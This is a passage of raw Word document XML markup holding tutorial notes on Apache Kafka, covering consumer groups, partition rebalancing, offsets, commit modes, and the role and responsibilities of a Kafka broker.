          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F9144" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>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Ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault-tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24B272" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEA9F7" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>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Topic has 3 partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B2799" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>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Consumer group has 2 consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629ADB44" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1308"/>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One consumer gets 2 partitions, the other gets 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAB2DE" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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If a consumer dies → Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalances</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reassigns partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CCF76" w14:textId="77777777" w:rsidR="00651890"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46FCC8A">
          <v:rect id="_x0000_i3117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F890E" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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25"/>
        <w:gridCol w:w="4946"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="23FC8511" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BB9B7DA" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ECEF0E6" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="530D0482" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2989AB07" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2172FAD2" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Reads records from Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="1D0F82AE" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3572CE3D" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Topic Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105EB9ED" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Logical segment of a topic; consumers read from them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="22669E4A" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77150EEC" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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lastRenderedPageBreak/>
              <w:t>Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DEA5909" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Position/index of a record in the partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5A1AEA0E" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D345A3" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Auto Commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2523665E" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Kafka commits offset automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="755D839A" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="559206FB" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Manual Commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E22BA9A" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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You commit offset after successful processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="13B79CBE" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8EAD19" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Consumer Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F935F30" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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Set of consumers working together for load sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0604D282" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0065189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006AEEA">
          <v:rect id="_x0000_i3118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D64712" w14:textId="71B37731" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC6AFF" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="774" w:name="_Toc196308254"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka Broker</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="774"/>
    </w:p>
    <w:p w14:paraId="5FB023F5" w14:textId="60BD27F7" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a core component of </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, responsible for receiving, storing, and serving messages to consumers. It acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Kafka ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03605615" w14:textId="77777777" w:rsidR="00E93F69"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16156C3">
          <v:rect id="_x0000_i3119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D32292" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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What is a Kafka Broker?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE204B2"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka server</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DAE958" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>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Accepts messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136B627" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>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Stores messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on disk (persistently)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF6C033" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>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Serves messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073829B1"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Each Kafka broker can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of reads and writes per second</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and support </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many clients</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A41184" w14:textId="77777777" w:rsidR="00E93F69"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E4A3269">
          <v:rect id="_x0000_i3120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140C0DC" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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Key Responsibilities of a Kafka Brok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53"/>
        <w:gridCol w:w="5920"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0DDEA35B" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C336B79" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BAED999" w14:textId="77777777" w:rsidR="00E93F69" w:rsidRPr="008E5BA7" w:rsidRDefault="00E93F69"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="3CAE6F85" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="312D90E8"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Message Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C1CEC9F"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Stores messages in topic partitions on disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0E905BA1" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AF92067"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Message Serving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="125CD627"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Delivers data to consumers based on offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5F11C47C" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5317F193"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Partition Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589B762F"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Maintains data for assigned partitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="75ED6E6D" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47ABB9F7"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Leader Election</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="220A084E"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Acts as </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>leader</w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for some partitions and </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>follower</w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for others</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="3732F457" w14:textId="77777777" w:rsidTr="00E93F69">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
